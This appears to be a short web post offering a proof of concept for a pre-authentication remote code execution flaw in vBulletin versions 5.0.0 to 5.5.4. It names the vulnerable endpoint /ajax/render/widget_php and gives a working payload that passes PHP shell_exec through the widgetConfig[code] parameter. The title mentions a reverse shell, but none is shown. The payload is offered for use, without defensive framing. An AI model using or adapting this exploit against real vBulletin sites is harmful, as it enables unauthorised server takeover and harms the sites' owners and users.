vBulletin 5.5.4 Rce to reverse shell

Poc:
vBulletin 5.x 0day pre-auth RCE

It works on latest version 5.5.4

Vulnerable version 5.0.0 till 5.5.4

Manual Poc By Legion

Vulnerable point:

/ajax/render/widget_php

Payload:
widgetConfig[code]=echo shell_exec(‘uname -a’);

Leave a Reply

Your email address will not be published. Required fields are marked *